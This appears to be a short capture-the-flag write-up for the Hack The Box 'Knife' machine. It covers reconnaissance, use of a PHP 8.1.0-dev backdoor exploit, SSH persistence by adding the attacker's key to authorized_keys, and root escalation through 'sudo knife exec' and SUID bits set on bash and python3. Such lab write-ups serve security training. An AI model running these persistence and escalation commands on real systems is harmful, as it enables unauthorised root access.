Home Knife - HTB

Knife - HTB

Recon & Enumeration

  • nmap -Pn -p- -A
2 => OpenSSH 8.2p1 Ubuntu => Apache httpd 2.4.41
  • Wappalyzer shows PHP 8.1 version.
  • Burp Repeater will also reveal the PHP version information in server headers.

Burp Suite Repeater reveals PHP version.png


  • Google: php 8.1 0 dev exploit
  • PHP 8.1.0-dev - ‘User-Agentt’ Remote Code Execution
  • 687da428-----------77b683b1c

  • Get ssh files from /home/james/.ssh
  • ssh-keygen on Kali VM to make your own id_rsa.pub and then paste its content in victim Knife’s /home/james/.ssh/authorized_key file.
  • On Kali: ssh -i ~/.ssh/id_rsa james@
  • I can ssh into Knife with my own private id_rsa key as I’ve added my id_rsa.pub key to /home/james/.ssh/authorized_key
  • sudo /usr/bin/knife exec
  • Starts an interactive Knife shell.

Privilege Escalation

  • sudo -l shows we can run /usr/bin/knife as root without password.
  • Went to Knife docs and knife has an exec command.
  • sudo /usr/bin/knife exec
  • sudo /usr/bin/knife exec -e 'sudo ruby -e exec "/bin/bash";'
  • system('chmod +s /bin/bash') in interactive shell.
  • Press enter and then Ctrl+D to exit.
  • ls -la /bin/bash
  • bash now has SUID
  • bash -p => root!
  • Try other commands as well like
  • sudo /usr/bin/knife exec -e 'sudo ruby'
  • We can also set SUID on python3'
  • system('chmod +s /usr/bin/python3') in interactive shell, Ctrl+D. And then:
  • python3 -c 'import os; os.execl("/bin/bash", "bash", "-p")'

HTB Knife Privilege Escalation

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